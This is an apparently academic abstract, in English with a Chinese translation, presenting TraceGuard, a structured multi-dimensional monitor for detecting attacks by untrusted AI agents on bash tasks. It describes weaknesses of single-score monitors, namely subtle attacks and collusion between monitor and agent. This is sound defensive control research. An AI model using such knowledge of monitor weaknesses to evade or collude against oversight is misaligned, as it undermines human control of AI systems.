AI control protocols use monitors to detect attacks by untrusted AI agents, but standard single-score monitors face two limitations: they miss subtle attacks where outputs look clean but reasoning is off, and they collapse to near-zero safety when the monitor is the same model as the agent (collusion). We present TraceGuard, a structured multi-dimensional monitoring protocol that evaluates agent actions across five dimensions -- goal alignment, constraint adherence, reasoning coherence, safety awareness, and action-trace consistency -- scored in parallel by independent LLM calls, augmented by seven heuristic detectors and an LLM-based intent analyzer. We evaluate on BashArena (637 bash tasks, 4 attack categories) within the ControlArena framework. Our results on 519 samples (279 honest, 240 attack) show that: (1) the hybrid approach achieves clear attack-honest separation (attack mean 0.616 vs. honest mean 0.206, Delta=0.410); (2) structured scoring constrains collusion -- the untrusted structured monitor achieves 95% safety vs. 0% for single-score untrusted monitoring; (3) goal alignment and constraint adherence are the most discriminative dimensions; and (4) a separation-of-duties variant splitting dimensions across trusted and untrusted models achieves 100% safety while preventing any single model from seeing the full evaluation. TraceGuard is implemented as a new monitor type for the open-source ControlArena framework.
翻译:人工智能控制协议使用监控器来检测不可信AI代理的攻击,但标准单分数监控器面临两个限制:它们会遗漏那些输出看似干净但推理存在问题的隐蔽攻击,并且当监控器与代理是同一模型时(共谋),安全性会骤降至接近零。我们提出TraceGuard——一种结构化多维度监控协议,该协议通过独立的LLM调用并行评估代理在五个维度上的行为:目标对齐、约束遵守、推理连贯性、安全意识和行动-轨迹一致性,并辅以七个启发式检测器和一个基于LLM的意图分析器。我们在ControlArena框架内的BashArena(637个bash任务,4种攻击类别)上进行评估。基于519个样本(279个诚实样本,240个攻击样本)的结果表明:(1)混合方法实现了清晰的攻击-诚实分离(攻击均值0.616 vs. 诚实均值0.206,差值Delta=0.410);(2)结构化评分约束了共谋——不可信结构化监控器实现95%安全性,而单分数不可信监控器为0%;(3)目标对齐和约束遵守是最具区分度的维度;(4)一种将维度拆分到可信与不可信模型之间的职责分离变体实现了100%安全性,同时防止任何单一模型看到完整评估。TraceGuard作为开源ControlArena框架的一种新型监控器实现。